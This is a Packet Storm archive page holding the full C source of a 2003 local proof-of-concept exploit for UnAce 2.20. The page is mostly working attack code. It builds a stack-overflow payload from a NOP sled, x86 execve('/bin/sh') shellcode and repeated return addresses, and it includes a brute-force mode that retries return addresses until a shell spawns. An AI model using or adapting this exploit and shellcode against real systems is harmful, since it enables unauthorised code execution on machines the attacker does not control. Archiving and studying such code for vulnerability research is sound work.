what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

unace-exp.c

unace-exp.c
Posted Nov 15, 2003
Authored by Li0n7

UnAce version 2.20 local proof of concept exploit. Original vulnerability discovery made by MegaHz. Bruteforcing option included.

tags | exploit, local, proof of concept
SHA-256 | d191042bbe5c634e4f3a8ef7041d81538d5210cf278f7e65753a216a082b7361

unace-exp.c

Change Mirror Download
/*Local exploit for unace v2.2 by Li0n7
*Bug reported by Andreas Constantinides <megahz@megahz.org>
*contact me: Li0n7@voila.fr
*visit us: ioc.fr.st
*tested on slackware 9.0
*usage: ./unace-exp[-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]
*-r <RET>: try to exploit unace with specified <RET> as return address
*-b: enables bruteforcing
*-s: specify the first address to bruteforce
*-d: the value to take away from the starting address at each bruteforcing iteration
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>

#define BSIZE 600
#define SIZE BSIZE*2
#define D_DIFF 1
#define D_START 0xbfffffff
#define PATH "/tmp/test/exploits/src/unace"
#define RET 0xbffff73a

char shellcode[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;

void exec_culn();
int tease();
int make_string(long ret_addr);
int bruteforce(long start,int diff);
void banner(char *argv0);

int
main(int argc,char *argv[])
{
char * option_list = "bd:r:s:";
int option,brute = 0,opterr = 0,diff = D_DIFF;
long ret,start = D_START;

banner(argv[0]);
if (argc < 1) exit(-1);

while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'd':
diff = atoi(optarg);
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(0);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
banner(argv[0]);
exit(-1);
}

if(brute == 1)
bruteforce(start,diff);

return 0;
}

void
exec_vuln()
{
execl(PATH,PATH,"e",buffer,NULL);
}


int
tease()
{
pid_t pid;
pid_t wpid;
int status;

pid = fork();

if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
exit(13);

} else if ( pid == 0 ) {

exec_vuln();

} else {

wpid = wait(&status);
if ( wpid == -1 ) {

fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
return 1;

} else if ( wpid != pid )

abort();

else {

if ( WIFEXITED(status) ) {

printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
return WEXITSTATUS(status);

} else if ( WIFSIGNALED(status) ) {

return WTERMSIG(status);
} else {

fprintf(stderr, "[-] Stopped.\n");

}
}
}
return 1;
}


int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;

buffer = (char *)malloc(SIZE);

if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
exit(-1);
}

ptr = buffer;

memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);

for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i<100;i++)
*(addr_ptr++) = ret_addr;
ptr = (char *)addr_ptr;
*ptr = 0;

return 0;
}


int
bruteforce(long start,int diff)
{
int ret;
long i;

fprintf(stdout,"[+] Starting bruteforcing...\n");

for(i=start;i<0;i=i-diff)
{
fprintf(stdout,"[+] Testing 0x%x...\n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
break;
}
}

return 0;
}

void
banner(char *argv0)
{
fprintf(stderr,"\n local exploit for unace v <= 2.2 by Li0n7\n");
fprintf(stderr," vulnerability reported by Andreas Constantinides <megahz@megahz.org>\n");
fprintf(stderr," visit us: http://www.ioc.fr.st\n");
fprintf(stderr," contact me: Li0n7[at]voila[dot]fr\n");
fprintf(stderr," usage: %s [-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]\n\n",argv0);
}

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close